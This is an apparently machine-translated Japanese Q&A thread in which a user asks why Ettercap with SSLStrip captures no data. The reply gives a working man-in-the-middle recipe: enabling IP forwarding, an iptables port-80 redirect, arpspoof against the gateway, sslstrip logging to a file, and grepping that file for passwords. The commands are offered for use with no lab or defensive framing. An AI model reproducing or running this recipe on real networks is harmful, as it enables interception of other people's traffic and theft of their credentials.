1

私はこれにBacktrack5を使用しています..しかし行き詰まっています...必要なデータを取得できません。これにはEttercapSSL Stripを使用しています...

ここで誰もそれを行う方法を考えていますか?

4

1 に答える 1

2

どうやっているのかはわかりませんが、私にとっては、ettercap-gtk (GUI) は常にゴミでした。簡単な DNS スプーフィングが必要でない限り、ettercap をスキップして、別のルートに進むことをお勧めします。

この攻撃 (Man in the middle、amirite) 用に iptables をセットアップし、ip_forward(ing) を有効にすることから始めて、いくつかの手順を説明しましょう。

エコー "1" > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1337 (送信先の任意のポートを選択できます)

ここで中間者になります: ここでは arpspoof を使用します: arpspoof -i wlan0 (または任意のインターフェイス) 192.168.1.X (X は通常 .1 または .255 のゲートウェイです)

次に SSLStrip を使用すると、./sslstrip.py -1 1337 -w filename (1337 は以前のポート、filename はデータをダンプする任意のファイル名) に進むことができます。

cat filename (以前のもの) とパイプ | でさえも。grep "password" など、スニッフィングしているものは何でも、またはすべてをダンプすることもできます。ファイルは、キャプチャ/削除された https データでいっぱいになります。

于 2012-08-14T10:59:53.570 に答える